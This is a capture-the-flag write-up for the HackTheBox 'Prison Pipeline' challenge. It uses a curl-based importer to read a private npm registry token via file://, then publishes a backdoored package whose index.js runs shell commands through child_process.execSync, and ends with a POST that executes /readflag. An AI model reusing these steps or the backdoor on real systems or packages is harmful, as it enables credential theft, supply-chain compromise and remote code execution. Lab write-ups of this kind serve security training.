HackTheBox Prision Pipeline Challenge
https://app.hackthebox.com/challenges/715
Description
One of our crew members has been captured by mutant raiders and is locked away in their heavily fortified prison. During an initial reconnaissance, the crew managed to gain access to the prison’s record management system. Your mission: exploit this system to infiltrate the prison’s network and disable the defenses for the rescuers. Can you orchestrate the perfect escape and rescue your comrade before it’s too late?
Exploitation
my challenge ip and port 94.237.60.154:32828
Prisoner Importer “Curl under the hood”
file:///home/node/.npmrc
Click on Import Prisoner Record
//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="
add in hosts 94.237.60.154 registry.prison-pipeline.htb
cd challenge/prisoner-db
nano .npmrc
//registry.prison-pipeline.htb:32828/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="
npm cache clean --force
npm whoami --registry=http://registry.prison-pipeline.htb:32828
nano index.js
async importPrisoner(url) {
// implement backdoor
const child_process = require('child_process');
if (url.includes('PWN:')) {
try {
let cmd = url.replace('PWN:', '');
let output = child_process.execSync(cmd).toString();
return output;
}
catch (error) {
return 'PWN: Error executing command.';
}
}
...SNIP...
}
nano package.json
"version": "1.0.1",
npm publish --registry=http://registry.prison-pipeline.htb:32828
sleep 5
curl -X POST 'http://94.237.60.154:32828/api/prisoners/import' -H 'Content-Type: application/json' -d '{"url": "PWN:/readflag"}'
Summary
Prision Pipeline: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.